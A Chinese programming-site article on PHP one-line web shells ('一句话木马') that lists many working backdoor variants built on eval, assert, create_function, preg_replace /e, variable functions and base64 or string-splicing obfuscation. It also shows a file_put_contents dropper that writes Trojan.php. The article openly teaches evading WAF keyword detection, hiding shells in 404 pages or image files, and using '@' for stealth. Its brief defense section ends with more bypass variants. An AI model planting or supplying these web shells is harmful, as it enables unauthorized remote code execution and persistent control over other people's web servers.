文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

php一句话木马变形技巧

2024-04-02 19:55

关注

一、什么是一句话木马?

一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。

二、我们如何发送命令,发送的命令如何执行?

我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。 所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。

0.eval函数


<?php eval($_POST['a']) ?>

其中eval就是执行命令的函数,**$_POST[‘a']**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马的强大之处。

因为木马是接收post请求中 “a” 的数据( $_POST[‘a']),所以我们必须以post方法发送数据并且将我们要执行的代码赋值给“a”。如果把木马中的post替换成get,那么我么就需要以GET方法发送“a”,

使用 其他函数制作一句话木马

1.assert函数


<?php assert(@$_POST['a']); ?>

2.create_function函数


<?php$fun = create_function('',$_POST['a']);$fun();?>

把用户传递的数据生成一个函数fun(),然后再执行fun()

3. call_user_func回调函数


<?php@call_user_func(assert,$_POST['a']);?>

call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数

这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。

4.preg_replace函数


<?php@preg_replace("/abcde/e", $_POST['a'], "abcdefg");?>

这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令

这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。

5. file_put_contents函数

利用函数生成木马


<?php
$test='<?php $a=$_POST["cmd"];assert($a); ?>';
file_put_contents("Trojan.php", $test);
?>

函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件的内容。

6.array数组


<?php$a='assert';array_map("$a",$_REQUEST);?>

上述定义参数a并赋值‘assert',利用array_map()函数将执行语句进行拼接。最终实现assert($_REQUEST)


<?php$item['JON']='assert';$array[]=$item;$array[0]['JON']($_POST["TEST"]);?>

利用函数的组合效果,使得多个参数在传递后组合成一段命令并执行。

7.PHP变量函数


<?php$a = "eval";$a(@$_POST['a']);?>

第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。

三、如何让一句话木马绕过waf ?

waf是网站的防火墙,例如安全狗就是waf的一种。waf通常以关键字判断是否为一句话木马,但是一句话木马的变形有很多种,waf根本不可能全部拦截。想要绕过waf,需要掌握各种PHP小技巧,掌握的技巧多了,把技巧结合起来,设计出属于自己的一句话木马。

1.PHP可变变量


<?php$bb="eval";$aa="bb";$$aa($_POST['a']);?>

看这句就能理解上述语句:$$aa = ( ( (aa) = $ (‘bb') = $bb = “eval”

2.str_replace函数


<?php$a=str_replace("Waldo", "", "eWaldoval");$a(@$_POST['a']);?>

函数功能:在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除"Waldo"。

3. base64_decode函数


<?php$a=base64_decode("ZXZhbA==")$a($_POST['a']);?>

这里是base64解密函数,"ZXZhbA=="是eval的base64加密。

4."."操作符


<?php$a="e"."v";$b="a"."l";$c=$a.$b;$c($_POST['a']);?>

5.parse_str函数


<?php$str="a=eval";parse_str($str);$a($_POST['a']);?>

执行这个函数后,生成一个变量$a,值为字符串"eval"

6.更换数据来源

6.1GET篇


<?php $_GET[a]($_GET[b]);  ?>

<?php @eval( $_GET[$_GET[b]])>

利用方法:


b=cmd&cmd=phpinfo()

6.2利用script代替<? 、?>标签


<script language="php">@eval_r($_GET[b])</script>

6.3利用session

7.字符替换或特殊编码

8.木马藏匿

1.404页面

2.图片木马,用文件包含调用

四、总结

绕过技巧:

tips:使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。

五、防御

1.禁用assert()函数,监控eval()
2.搜索日志的assert。
亦可能绕过:


<?php $c=$_GET[n].'t'; @$c($_POST[cmd]); ?>

<?php $c=base64_decode('YXNzZXI=').$_GET[n].'t'; @$c($_POST[cmd]); ?>

以上就是php一句话木马变形技巧的详细内容,更多关于php一句话木马变形技巧的资料请关注编程网其它相关文章!

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯